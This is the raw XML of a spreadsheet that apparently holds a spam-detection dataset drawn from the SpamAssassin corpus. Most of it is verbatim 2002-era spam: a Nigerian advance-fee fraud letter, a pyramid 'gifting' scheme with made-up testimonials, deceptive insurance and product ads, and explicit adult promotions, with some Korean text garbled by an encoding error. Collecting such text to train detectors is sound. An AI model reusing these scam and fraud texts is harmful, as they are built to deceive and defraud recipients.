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cuments\COS30049 - Computing Technology Innovation Project\dataset\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="8_{52C042C7-6C64-4C43-A11B-930AB0D51633}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-108" yWindow="-108" windowWidth="23256" windowHeight="14856" activeTab="1" xr2:uid="{1B07C800-665F-441C-8E3F-EAC0FA49A811}"/>
  </bookViews>
  <sheets>
    <sheet name="dataset" sheetId="2" r:id="rId1"/>
    <sheet name="spam (2)" sheetId="4" r:id="rId2"/>
    <sheet name="Sheet1" sheetId="1" r:id="rId3"/>
  </sheets>
  <definedNames>
    <definedName name="ExternalData_1" localSheetId="0" hidden="1">dataset!$A$1:$B$6047</definedName>
    <definedName name="ExternalData_1" localSheetId="1" hidden="1">'spam (2)'!$A$1:$A$5574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19" i="4"/>
  <c r="C5020"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5" i="4"/>
  <c r="C5226"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C5566" i="4"/>
  <c r="C5567" i="4"/>
  <c r="C5568" i="4"/>
  <c r="C5569" i="4"/>
  <c r="C5570" i="4"/>
  <c r="C5571" i="4"/>
  <c r="C557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2" i="4"/>
  <c r="C34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1B94E9-6D22-48BF-B9D4-C37CA2FFB4E8}" keepAlive="1" name="Query - completeSpamAssassin" description="Connection to the 'completeSpamAssassin' query in the workbook." type="5" refreshedVersion="8" background="1" saveData="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=completeSpamAssassin;Extended Properties=&quot;&quot;" command="SELECT * FROM [completeSpamAssassin]"/>
  </connection>
  <connection id="2" xr16:uid="{2AF153D8-9444-4FD0-A388-A09210940558}" keepAlive="1" name="Query - spam" description="Connection to the 'spam' query in the workbook." type="5" refreshedVersion="0" background="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=spam;Extended Properties=&quot;&quot;" command="SELECT * FROM [spam]"/>
  </connection>
  <connection id="3" xr16:uid="{38228E20-FD35-4649-A047-B47C9AC28F5F}" keepAlive="1" name="Query - spam (2)" description="Connection to the 'spam (2)' query in the workbook." type="5" refreshedVersion="8" background="1" saveData="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=&quot;spam (2)&quot;;Extended Properties=&quot;&quot;" command="SELECT * FROM [spam (2)]"/>
  </connection>
</connections>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="17196" uniqueCount="10467">
  <si>
    <t>Label</t>
  </si>
  <si>
    <t xml:space="preserve">
Save up to 70% on Life Insurance.
Why Spend More Than You Have To?Life Quote Savings
Ensuring your 
      family's financial security is very important. Life Quote Savings makes 
      buying life insurance simple and affordable. We Provide FREE Access to The 
      Very Best Companies and The Lowest Rates.Life Quote Savings is FAST, EASY and 
            SAVES you money! Let us help you get started with the best values in 
            the country on new coverage. You can SAVE hundreds or even thousands 
            of dollars by requesting a FREE quote from Lifequote Savings. Our 
            service will take you less than 5 minutes to complete. Shop and 
            compare. SAVE up to 70% on all types of Life insurance! Click Here For Your 
            Free Quote!Protecting your family is the best investment you'll ever 
          make!
If you are in receipt of this email 
      in error and/or wish to be removed from our list, PLEASE CLICK HERE AND TYPE REMOVE. If you 
      reside in any state which prohibits e-mail solicitations for insurance, 
      please disregard this 
      email.
</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</si>
  <si>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PrizeMamaIf you wish to leave this list please use the link below.
http://www.qves.com/trim/?ilug@linux.ie%7C17%7C114258
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</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</si>
  <si>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PrizeMamaIf you wish to leave this list please use the link below.
http://www.qves.com/trim/?zzzz@spamassassin.taint.org%7C17%7C308417</t>
  </si>
  <si>
    <t>##################################################
#                                                #
#                 Adult Club                     #
#           Offers FREE Membership               #
#                                                #
##################################################&gt;&gt;&gt;&gt;&gt;  INSTANT ACCESS TO ALL SITES NOW
&gt;&gt;&gt;&gt;&gt;  Your User Name And Password is.
&gt;&gt;&gt;&gt;&gt;  User Name: zzzz@spamassassin.taint.org
&gt;&gt;&gt;&gt;&gt;  Password: 7603825 of the Best Adult Sites on the Internet for FREE!
---------------------------------------
NEWS 08/18/02
With just over 2.9 Million Members that signed up for FREE, Last month there were 721,184 New
Members. Are you one of them yet???
---------------------------------------
Our Membership FAQQ. Why are you offering free access to 5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5 membership sites?
A. No just one to get access to all of them.Q. How do I get started?
A. Click on one of the following links below to become a member.- These are multi million dollar operations with policies and rules.
- Fill in the required info and they won't charge you for the Free pass!
- If you don't believe us, just read their terms and conditions.---------------------------# 5. &gt; Adults Farm
http://80.71.66.8/farm/?aid=760382
Girls and Animals Getting Freaky....FREE Lifetime Membership!!# 4. &gt; Sexy Celebes
http://80.71.66.8/celebst/?aid=760382
Thousands Of XXX Celebes doing it...FREE Lifetime Membership!!# 3. &gt; Play House Porn
http://80.71.66.8/mega/?aid=760382
Live Feeds From 60 Sites And Web Cams...FREE Lifetime Membership!!# 2. &gt; Asian Sex Fantasies
http://80.71.66.8/asian/?aid=760382
Japanese Schoolgirls, Live Sex Shows ...FREE Lifetime Membership!!# 1. &gt; Lesbian Lace
http://80.71.66.8/lesbian/?aid=760382
Girls and Girls Getting Freaky! ...FREE Lifetime Membership!!--------------------------Jennifer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 . Please allow 24 hours for removal.vonolmosatkirekpups</t>
  </si>
  <si>
    <t>I thought you might like these:
1) Slim Down - Guaranteed to lose 10-12 lbs in 30 days
http://www.freeyankee.com/cgi/fy2/to.cgi?l=822slim12) Fight The Risk of Cancer! 
http://www.freeyankee.com/cgi/fy2/to.cgi?l=822nic1 3) Get the Child Support You Deserve - Free Legal Advice 
http://www.freeyankee.com/cgi/fy2/to.cgi?l=822ppl1Offer Manager
Daily-Deals
If you wish to leave this list please use the link below.
http://www.qves.com/trim/?social@linux.ie%7C29%7C134077
-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>A POWERHOUSE GIFTING PROGRAM You Don't Want To Miss! 
  GET IN WITH THE FOUNDERS! 
The MAJOR PLAYERS are on This ONE
For ONCE be where the PlayerS are
This is YOUR Private InvitationEXPERTS ARE CALLING THIS THE FASTEST WAY 
TO HUGE CASH FLOW EVER CONCEIVED
Leverage $1,000 into $50,000 Over and Over AgainTHE QUESTION HERE IS:
YOU EITHER WANT TO BE WEALTHY 
OR YOU DON'T!!!
WHICH ONE ARE YOU?
I am tossing you a financial lifeline and for your sake I 
Hope you GRAB onto it and hold on tight For the Ride of youR life!TestimonialsHear what average people are doing their first few days:
ï¿½We've received 8,000 in 1 day and we are doing that over and over again!' Q.S. in AL
 ï¿½I'm a single mother in FL and I've received 12,000 in the last 4 days.ï¿½ D. S. in FL
ï¿½I was not sure about this when I sent off my $1,000 pledge, but I got back $2,000 the very next day!ï¿½ L.L. in KY
ï¿½I didn't have the money, so I found myself a partner to work this with. We have received $4,000 over the last 2 days. 
I think I made the right decision; don't you?ï¿½ K. C. in FL
ï¿½I pick up $3,000 my first day and I  they gave me free leads and all the training, you can too!ï¿½ J.W. in CAANNOUNCING: We will CLOSE your sales for YOU! And Help you get a Fax Blast IMMEDIATELY Upon Your Entry!!!    YOU Make the MONEY!!!
FREE LEADS!!! TRAINING!!!$$DON'T WAIT!!! CALL NOW $$
FAX BACK TO: 1-800-421-6318 OR Call 1-800-896-6568 Name__________________________________Phone___________________________________________Fax_____________________________________Email____________________________________________Best Time To Call_________________________Time Zone________________________________________This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</si>
  <si>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4139vOLW7-758DoDY1425FRhM1-764SMFc8513fCsLl40</t>
  </si>
  <si>
    <t xml:space="preserve">ReliaQuote - Save Up To 70% On Life Insurance
Â 
Life
                                can change in an instant. That's why it is so
                                important to protect your family's financial future
                                with sufficient life insurance coverage.State
                          of Residence:Select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Date
                          of Birth (MM/DD/YY):
 MM
01
02
03
04
05
06
07
08
09
10
11
12                          /
DD
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31                          /
YY
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
Sex:
                                 Male
                                 Female
Have
                          you used any tobacco products in the last 12 months?
                                 No
                                 Yes
Coverage
                          Amount:Select Amount
100,000
125,000
150,000
175,000
200,000
225,000
250,000
275,000
300,000
325,000
350,000
375,000
400,000
425,000
450,000
475,000
500,000
550,000
600,000
650,000
700,000
750,000
800,000
850,000
900,000
950,000
1,000,000
1,250,000
1,500,000
1,750,000
2,000,000
2,250,000
2,500,000
3,000,000
3,500,000
4,000,000
4,500,000
5,000,000
6,000,000
7,000,000
8,000,000
9,000,000
10,000,000
11,000,000
12,000,000
13,000,000
14,000,000
15,000,000
How
                          long do you need the coverage?Select Year
5 Years
10 Years
15 Years
20 Years
25 Years
30 Years
Â  
ReliaQuote
                    makes it easy and affordable. We can instantly provide you
                    with free quotes from highly rated insurance companies. 
Save
                        up toon
                        Life Insurance
Compare quotes today.                  There is nothing more 
                  important than protecting 
                  their future.
Copyright 2001 ReliaQuote,
        Inc.
        All rights reserved.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</si>
  <si>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TIRED OF THE BULL OUT THERE?
Want To Stop Losing Money?WANT A REAL MONEY MAKER?
RECEIVE $1,000-$5,000 TODAY!
EXPERTS ARE CALLING THIS THE FASTEST WAY TO HUGE CASH FLOW EVER CONCEIVED!A POWERHOUSE Gifting Program You Don't Want To Miss!
We work as a TEAM! This is YOUR Private Invitation GET IN WITH THE FOUNDERS! This is where the BIG BOYS PLAY! The MAJOR PLAYERS are on This ONE For ONCE be where the Players areThis is a system that will drive $1,000's to your doorstep 
In a short period of time!Leverage $1000.00 into $50,000, Over and Over Again THE QUESTION HERE IS:YOU EITHER WANT TO BE WEALTHY OR YOU DON'T!!!WHICH ONE ARE YOU?I am tossing you a financial lifeline and for your sake I Hope you GRAB onto it and hold on tight For the Ride of your life!TestimonialsHear what average people are doing their first few days:
ï¿½We've received 8,000 in 1 day and we are doing that over and over again!' Q.S. in AL
 ï¿½I'm a single mother in FL and I've received 12,000 in the last 4 days.ï¿½ D. S. in FL
ï¿½I was not sure about this when I sent off my $1,000 pledge, but I got back $2,000 the very next day!ï¿½ L.L. in KY
ï¿½I didn't have the money, so I found myself a partner to work this with. We have received $4,000 over the last 2 days. I think I made the right decision; don't you?ï¿½ K. C. in FL
ï¿½I pick up $3,000 my first day and I they gave me free leads and all the training, you can too!ï¿½ J.W. in CAThis WILL be the Most IMPORTANT Call you make this Year!
FREE LEADS!!!!!!! TRAINING!!!!!!!ANNOUNCING: We will CLOSE your sales for YOU! And Help you get a Fax Blast IMMEDIATELY Upon Your Entry!!!    YOU Make the MONEY!!!
FREE LEADS!!!!!!! TRAINING!!!!!!!$$DON'T WAIT!!! CALL NOW $$ 1-800-896-6568
Print and Fax to 1-800-421-6318 or send an email 
requesting more information to successleads@firemail.de
Please include your name and telephone number. *Receive 10,000 FREE LEADS just for responding! (a $499.99 value)Name___________________________________
Phone___________________________________
Fax_____________________________________
Email___________________________________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
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear ricardo1 ,
COST EFFECTIVE Direct Email Advertising
Promote Your Business For As Low As 
$50 Per 
1 Million
 Email Addresses
MAXIMIZE YOUR MARKETING DOLLARS!
Complete and fax this information form to 309-407-7378.
A Consultant will contact you to discuss your marketing needs.
NAME:___________________________________________________________________
COMPANY:_______________________________________________________________
ADDRESS:________________________________________________________________
CITY:_____________________________________________________________________
STATE:___________________________________________________________________
PHONE:___________________________________________________________________
E-MAIL:__________________________________________________________________
WEBSITE: (Not Required)_______________________________________________________
___________________________________________________________________________
___________________________________________________________________________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[247(^(PO1:KJ)_8J7BJK9^":}H&amp;*TG0BK5NKIYs5]
</t>
  </si>
  <si>
    <t>Cellular Phone Accessories All At Below Wholesale Prices!http://202.101.163.34:81/sites/merchant/sales/Hands Free Ear Buds 1.99! 
Phone Holsters 1.98! 
Booster Antennas Only $0.99
Phone Cases 1.98! 
Car Chargers 1.98! 
Face Plates As Low As 0.99! 
Lithium Ion Batteries As Low As 6.94! http://202.101.163.34:81/sites/merchant/sales/Click Below For Accessories On All NOKIA, MOTOROLA LG, NEXTEL, 
SAMSUNG, QUALCOMM, ERICSSON, AUDIOVOX PHONES At Below 
WHOLESALE PRICES!http://202.101.163.34:81/sites/merchant/sales/***If You Need Assistance Please Call Us (732) 751-1457***
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To be removed from future mailings please send your remove 
request to: removemenow68994@btamail.net.cn 
Thank You and have a super day :)</t>
  </si>
  <si>
    <t>Click Here Now !
Simply Amateur
Just like the girl next door.
XXX Free Tour !
First time photos !Sneeky hidden cams !Nude exibitionists !Cheating Wives and Girlfriends !Click here to be removed</t>
  </si>
  <si>
    <t xml:space="preserve">FREE Motorola Cell Phone with $50 Cash Back!
*Free phone
      offer subject to VoiceStream Wireless credit approval. Must activate a new
      line of service to receive a free phone. A one-time activation fee of $25
      applies to all new activations. Coverage not available in all areas. Offer
      fulfilled by SimplyWireless.com, a VoiceStream authorized dealer. See site
      for additional offer details.
      **$50 mail-in rebate is available for new VoiceStream service plans
      $29.99 and greater. Rebate ends
8/31/02.You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</si>
  <si>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Lowest Rate Services
Conferencing Made Easy
Only 18 Cents Per Minute!
(Including Long Distance!)No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Field*Name*
Web 
            Address
Company 
            Name*            State*
Business 
            Phone*
Home 
            Phone
Email 
            Address*
Type of 
            BusinessTo be removed from our distribution lists, please  
      Click 
      here.
</t>
  </si>
  <si>
    <t xml:space="preserve">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money.ORDER INFORMATION 
ACT WITHIN THE NEXT 7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build.The FREE BONUSES ALONE ARE WORTH ACTING NOW! 
THE CABLE DESCRAMBLER KIT COMES WITH A THIRTY DAY
MONEY BACK GUARANTEE! IF YOUR NOT COMPLETELY SATISFIED,
SEND THE CABLE DESCRAMBLER KIT BACK AND YOU KEEP
THE BONUSES FOR FREE. YOU HAVE NOTHING TO LOSE!!REGULAR PRICE $19.95 ACT WITHIN THE NEXT 7 DAYS
AND RECEIVE FOR $12.95 ACT NOW!! SIMPLY SEND $12.95 THAT'S RIGHT ONLY $12.95 BUT YOU MUST 
ACT WITHIN 7 DAYS FOR THIS SPECIAL PRICE!!!SEND $12.95 CHECK OR MONEY ORDER.TO:GPG SOFTWARE
12105 WEST CENTER RD #382
OMAHA, NE 68144
THIS INFORMATION IS SOLD FOR EDUCATIONAL PURPOSES ONLY
If you would like to be removed richeyg40@yahoo.com
</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</si>
  <si>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1349lmrd5-948HyhJ3622xXiM0-290VZdq6044fFvN0-799hUsU07l50</t>
  </si>
  <si>
    <t xml:space="preserve">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
</t>
  </si>
  <si>
    <t>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</si>
  <si>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PrizeMamaIf you wish to leave this list please use the link below.
http://www.qves.com/trim/?ilug@linux.ie%7C17%7C114258-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>CENTRAL BANK OF NIGERIA
FOREIGN REMITTANCE DEPT.
TINUBU SQUARE, LAGOS  NIGERIA
EMAIL-smith_j@mailsurf.com
23TH OF August 2002ATTN:PRESIDENT/CEO
                    STRICTLY PRIVATE BUSINESS PROPOSAL
I am MR.Johnson S. Abu, the bills and exchange Director at the
ForeignRemittance Department of the Central Bank of Nigeria.  I am 
writingyou
this letter to ask for your support and cooperation to carrying thisbusiness
opportunity in my department.  We discovered abandoned the sumof
US$37,400,000.00 (Thirty seven million four hundred thousand unitedstates
dollars) in an account that belong to one of our foreign customers,an
American
late Engr. John Creek (Junior) an oil merchant with the federal government
of
Nigeria who died along with his entire family of a wifeand two children in
Kenya Airbus (A310-300) flight KQ430 in November2000.Since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fund.We have agreed that our ratio of sharing will be as stated thus: 30%for
you as
foreign partner and 70% for us the officials in my department.Upon the successful completion of this transfer, my colleague and I
willcome to
your country and mind our share. It is from our 60% we intendto import
computer
accessories into my country as way of recycling thefund.  To commence this
transaction we require you to immediately indicateyour interest by calling
me
or sending me a fax immediately on the aboveTelefax # and enclose your
private
contact Telephone #, Fax #, full nameand address and your designated
banking co-
 ordinates to enable us fileletter of  claim to the appropriate department
for
necessary approvalsbefore the transfer can be made.Note also, this transaction must be kept strictly confidential becauseof its
nature.NB: Please remember to give me your Phone and Fax NoMR.Johnson Smith  Abu-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>empty</t>
  </si>
  <si>
    <t xml:space="preserve">Copyright 2002 - All rights reservedIf you would no longer like us 
to contact you or feel that you havereceived this email in error, 
please click here 
to unsubscribe.
</t>
  </si>
  <si>
    <t>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</si>
  <si>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
If you wish to leave this list please use the link below.
http://www.qves.com/trim/?zzzz@spamassassin.taint.org%7C17%7C308417</t>
  </si>
  <si>
    <t xml:space="preserve">MILFhunter
&lt;!-- hide from old browsers
	function loadPage(pageURL){
	location.href = pageURL.options[pageURL.selectedIndex].value
	}
//--&gt;
MILF HUNTER
Do you know where your mom is? MORE SAMPLE PICS Â Â Â Â  MORE SAMPLE MOVIES Â Â Â Â  LIST OF MILFs 
Â 
CLICK 
          HERE to enlarge your PENIS 3-4 inches NATURALLY!!
Â 
Â 
Click
          Here to be removed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</si>
  <si>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tuckers</t>
  </si>
  <si>
    <t xml:space="preserve">Norton AD
Â 
      ATTENTION:
            This is a MUST for ALL Computer Users!!!
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diagnostics!Â 
6
Feature-Packed Utilities
1
 Great
            Price             A $300+  Combined Retail Value
            YOURS for Only $29.99!
&lt;Includes
            FREE Shipping!&gt;
 Don't fall prey to destructive viruses
    or hackers!ProtectÂ  your computer and your valuable  information
    and-&gt;
            CLICK HERE to Order Yours NOW! &lt;-Click
      here for more information
Â Â Â Â Â Â Â 
      Your
      email address was obtained from an opt-in list. Opt-in MRSA List
      Â Purchase Code # 312-1-010.Â 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</si>
  <si>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Suppliers of Computers, Printers, etc. &amp; Consumables 
Central Data Supplies 
24, Middleton Road, Banbury, Oxon, OX16 4QJ. Tel: 01295 271666 Fax 01295
256876 
Est 1985
Good Afternoon,
Please find below the pricing and specification of the laptops which
currently have available in stock for immediate despatch.
IBM ThinkPad 760EL Laptop Computer (Stock Ref 683)
Intel Pentium 1 133MHz Processor
8MB RAM
1GB Hard Drive
12.1' TFT Display 
Sound &amp; Speakers
No Modem
No CD-ROM Drive  
Internal 3.5' Floppy Drive    
3 Months Warranty                      @             Â£119
IBM ThinkPad 765L Laptop Computer (Stock Ref 6076)
Intel Pentium 1 166MHz Processor
32MB RAM
5GB Hard Drive
13.3' TFT Display 
Sound &amp; Speakers
No Modem
No CD-ROM Drive  
Internal 3.5' Floppy Drive    
3 Months Warranty                      @             Â£149
IBM ThinkPad 770 Laptop Computer (Stock Ref 4225)
Intel Pentium 1 233MHz Processor
32MB RAM
5GB Hard Drive
14.1' TFT Display 
USB, IRDA, Sound &amp; Speakers
Internal 56K Modem
No CD-ROM Drive  
Internal 3.5' Floppy Drive    
3 Months Warranty                      @             Â£249
IBM ThinkPad 380 Laptop Computer (Stock Ref 7868)
Intel Pentium 11 233MHz Processor
32MB RAM
4GB Hard Drive
12.1' TFT Display 
USB, IRDA, Sound &amp; Speakers
No Modem
Internal CD-ROM Drive  
Internal 3.5' Floppy Drive    
3 Months Warranty                      @             Â£289
IBM ThinkPad 770X Laptop Computer (Stock Ref 8051)
Intel Pentium 11 300MHz Processor
64MB RAM
8GB Hard Drive
14.1' TFT Display 
USB, IRDA, Sound &amp; Speakers
Internal 56K Modem
External CD-ROM Drive  
Internal 3.5' Floppy Drive    
3 Months Warranty                      @             Â£349
IBM ThinkPad 770X Laptop Computer (Stock Ref 8220)
Intel Pentium 11 233MHz Processor
64MB RAM
6.4GB Hard Drive
14.1' TFT Display 
USB, IRDA, Sound &amp; Speakers
Internal 56K Modem
Internal CD-ROM Drive  
Internal 3.5' Floppy Drive    
3 Months Warranty                      @             Â£389
Toshiba 7020CT Laptop Computer (Stock Ref 3111)
Intel Pentium 11 266MHz Processor
128MB RAM
6GB Hard Drive
13.3' TFT Display 
USB, IRDA, Sound &amp; Speakers
Internal 56K Modem  
Docking Station Including 3.5' Floppy Drive And CD-ROM Drive  
3 Months Warranty                      @             Â£389
IBM T20 Laptop Computer (Stock Ref 6062)
Intel Pentium 111 550MHz Processor
256MB RAM
12GB Hard Drive
14.1' XGA TFT Display 
USB, IRDA, Sound &amp; Speakers
Internal 56K Modem  
No CD-ROM Drive
Internal 3.5' Floppy Drive 
3 Months Warranty                      @             Â£549
Dell C500 Laptop Computer (Stock Ref 7052)
Intel Celeron 700MHz Processor
128MB RAM
6GB Hard Drive
12.1' XGA TFT Display 
USB, IRDA, Sound &amp; Speakers
Internal 56K Modem  
Internal CD-ROM Drive
External 3.5' Floppy Drive 
3 Months Warranty                      @             Â£609
Other specifications are available, so if the spec you require is not
listed please do not hesitate to call our sales team on 01295 271666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E&amp;OE.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>1) Fight The Risk of Cancer!
http://www.adclick.ws/p.cfm?o=315&amp;s=pk0072) Slim Down - Guaranteed to lose 10-12 lbs in 30 days
http://www.adclick.ws/p.cfm?o=249&amp;s=pk0073) Get the Child Support You Deserve - Free Legal Advice
http://www.adclick.ws/p.cfm?o=245&amp;s=pk0024) Join the Web's Fastest Growing Singles Community
http://www.adclick.ws/p.cfm?o=259&amp;s=pk0075) Start Your Private Photo Album Online!
http://www.adclick.ws/p.cfm?o=283&amp;s=pk007Have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
  </si>
  <si>
    <t xml:space="preserve">This is the bottom line.  If you can GIVE AWAY CD's for FREE to people (like 80-100 in one month) and then let ME talk to them FOR you - if you can GIVE AWAY free product samples -  then YOU can earn $5,000 in the next 30 - 45 days.Think I'm kidding?  We earned PRECISELY $26,087.58 in our first 94 days doing JUST that - and we scanned our checks online for you to see them with your own eyes!  We've TWEAKED things a little because WE DON'T WANT you to talk to ANYONE.  WE WANT to talk to people FOR YOU.if you are ....
VERY BUSY or,
Aren't GOOD AT TALKING TO PEOPLE or,
DON'T WANT to talk to people....Then let US work FULL TIME for you.  We've helped others....
   Julie P. earned $750 in one week with us
   Jeff A. earned $6500 in 5 weeks with usAnd we NOW have an EXACT business plan for you and can tell you EXACTLY what to expect with where you're starting.  No guesswork - we've done it.And if you DO want to seriously evaluate this, we would be HAPPY to even fly you to Los Angeles at OUR expense to get a closer look!  NO KIDDING! To get your FREE CD, please send the following information:Name
Postal Mailing Address
Phone Number with Area Codemailto:cashflows99@excite.com?subject=FREE_CDTo be removed from future mailings, please
mailto:cashflows99@excite.com?subject=REMOVE********************************
This email ad is being sent in full compliance with U.S. Senate Bill 1618, Title #3, Section 301,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</si>
  <si>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http://web.kuhleersparnis.ch/hgh/index.html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t>
  </si>
  <si>
    <t xml:space="preserve">
ìš”ì¦˜ ëœ¨ëŠ” ì§ì¢… Best 5 : ê¸ˆìœµ / IT / ë°©ì†¡ / ë·°í‹° / ì¸í…Œë¦¬ì–´ ìš”ì¦˜ ëœ¨ëŠ” ì§ì¢… Best
5 : ê¸ˆìœµ / IT / ë°©ì†¡ / ë·°í‹° / ì¸í…Œë¦¬ì–´ 20ëŒ€ ì Šì€ì´ë“¤ì´ ë½‘ì€ 'ì¼í•˜ê³  ì‹¶ì€
ë¶„ì•¼'ë¡œ ê¸ˆìœµ, IT, ë°©ì†¡, ë·°í‹°/íŒ¨ì…˜, ì¸í…Œë¦¬ì–´/ê±´ì¶•ë¶„ì•¼ê°€ ì„ ì •ë˜ì—ˆë‹¤.
ì´ë“¤ ì¤‘ì—ì„œë„ ê¸ˆìœµë¶„ì•¼ëŠ”
ê¸‰ì—¬ê°€ ìƒëŒ€ì ìœ¼ë¡œ ë†’ê³  ì£¼5ì¼ì œ ê·¼ë¬´ì— ì•žì„œìžˆëŠ” 'ì™¸êµ­ê³„ ì€í–‰'ì´, ITë¶„ì•¼ëŠ” 'ê²Œìž„'ë¶„ì•¼ê°€, ë°©ì†¡ë¶„ì•¼ëŠ” ìš”ì¦˜
ì‹ ì„¸ëŒ€ ëŒ€í•™ìƒë“¤ì´ ê°€ìž¥ ì„ í˜¸í•˜ëŠ” ì§ì—…ì¸ í™ˆì‡¼í•‘ì˜ 'ì‡¼í•‘í˜¸ìŠ¤íŠ¸'ì™€ ì¼€ì´ë¸”ë°©ì†¡ì˜ 'VJ'ë¥¼, ë·°í‹°/íŒ¨ì…˜ë¶„ì•¼ëŠ” ç¾Žì—
ëŒ€í•œ ê´€ì‹¬ê³ ì¡°ë¡œ ì¸í•´ 'í”¼ë¶€ê´€ë¦¬ì‚¬' ë˜ëŠ” 'ìŠ¤íƒ€ì¼ë¦¬ìŠ¤íŠ¸', ì¸í…Œë¦¬ì–´/ê±´ì¶•ë¶„ì•¼ì—ì„œëŠ” ë¦¬ëª¨ë¸ë§ ë¶ì— íž˜ìž…ì–´
'ì¸í…Œë¦¬ì–´'ìª½ì´ ë†’ì€ ìˆœìœ„ë¡œ ê¼½í˜”ë‹¤.
ê·¸ëŸ¼, ì´ì²˜ëŸ¼ ë†’ì€
ì£¼ê°€ë¥¼ êµ¬ê°€í•˜ê³  ìžˆëŠ” ì§ì¢…ì— ê·¼ë¬´í•˜ê¸° ìœ„í•´ì„œëŠ” ì–´ë–¤ ìžê²©ìš”ì†Œë¥¼ ê°–ì¶”ëŠ” ê²ƒì´ ì¢‹ì„ê¹Œ?ë³¸ê²©ì ì¸ ì—¬ë¦„ì´
ì‹œìž‘ë˜ëŠ” ì´ë•Œ, ëœ¨ëŠ” ì§ì¢…ìœ¼ë¡œì˜ í™•ì‹¤í•œ ì¤€ë¹„ë¥¼ í•´ë³´ìž.
 ê¸ˆìœµ : 98ë…„ ë§ IMFê°€ ì‹œìž‘ë  ë¬´ë µë§Œ í•´ë„
ì€í–‰/ë³´í—˜/ì¦ê¶Œê³„ì˜ í•œíŒŒëŠ” ê·¸ ì–´ëŠë¶„ì•¼ë³´ë‹¤ë„ ì¹˜ì—´í–ˆê³  ë¬´ì°¨ë³„ì ì¸ êµ¬ì¡°ì¡°ì •ìœ¼ë¡œ ì¸í•´ ë§Žì€ ì§ìž¥ì¸ë“¤ì´ ê±°ë¦¬ë¡œ
ë‚´ëª°ë¦¬ë‹¤ì‹œí”¼ ë˜ì—ˆì—ˆë‹¤. í•˜ì§€ë§Œ 2002ë…„ í˜„ìž¬, ì¹´ë“œì‚¬ì˜ í˜¸í™©ì„ ì‹œìž‘ìœ¼ë¡œ ì€í–‰ê¶Œ, ì¦ê¶Œ, ë³´í—˜ë¶„ì•¼ì˜ ê²½ë ¥ì§
ìˆ˜ìš”ê°€ ë§Žì•„ì§€ê³  ìžˆìœ¼ë©°, ì‹ ìž…ì§ì˜ ì±„ìš© ë˜í•œ ë§Žì•„ì§€ê³  ìžˆë‹¤. ì˜¬ í•˜ë°˜ê¸°ê¹Œì§€ ì¸ë ¥ì‹œìž¥ì€ ë§‘ìŒ
ìƒíƒœ.
ê¸ˆìœµë¶„ì•¼ëŠ” ìžê²©ì¦ì´ ìžˆìœ¼ë©´
ìžˆì„ìˆ˜ë¡ ì¢‹ë‹¤. ê¸ˆìœµê¶Œì—ì„œ ìœ ìš©í•˜ê²Œ ì“°ì´ëŠ” ìžê²©ì¦ìœ¼ë¡œëŠ” íˆ¬ìžìƒë‹´ì‚¬, ê¸ˆìœµìžì‚°ê´€ë¦¬ì‚¬(FP),
ìž¬ë¬´ìœ„í—˜ê´€ë¦¬ì‚¬(FRM) ë“±. íŠ¹ížˆ ì¦ê¶Œì‚¬ì— ê·¼ë¬´í•  ì´ë“¤ì´ë¼ë©´ íˆ¬ìžìƒë‹´ì‚¬ë‚˜ ê¸ˆìœµìžì‚°ê´€ë¦¬ì‚¬ì˜ ìžê²©ì¦ì€ ê¸°ë³¸ì´ ë˜ê³ 
ìžˆìœ¼ë‹ˆ ë°˜ë“œì‹œ ì·¨ë“í•´ë‘ë„ë¡ í•˜ìž.  ì‹œí—˜ì¼ì •
ë³´ê¸°
 IT : ì˜¬í•´ë“¤ë©´ì„œ IT/ì¸í„°ë„· ì—…ê³„ì˜
ìˆ˜ìµêµ¬ì¡°ê°€ ì¢‹ì•„ì§€ê³  ìžˆìœ¼ë©°, ì¸í„°ë„· ë¶„ì•¼ëŠ” í† ì¢…ì¸í„°ë„· ê¸°ì—…ì˜ ìˆ˜ìµì„±ì´ ì™¸êµ­ê³„ë³´ë‹¤ í›¨ì”¬ ì•žì„œê°€ê³  ìžˆëŠ” ìƒí™©ì´ë‹¤.
ëª‡ ë…„ì „ë¶€í„° ê²Œìž„ìœ¼ë¡œì˜ ê´€ì‹¬ì´ ë†’ì•„ì§€ë©´ì„œ íˆ¬ìž ë˜í•œ ë§Žì•„ì§€ê³  ìžˆëŠ” ìƒíƒœ. í•˜ë°˜ê¸° ì¸ë ¥ì‹œìž¥
ë§‘ìŒ.
ITë¶„ì•¼ì—ì„œëŠ” ì¸ë ¥ìˆ˜ê¸‰ì„ í• 
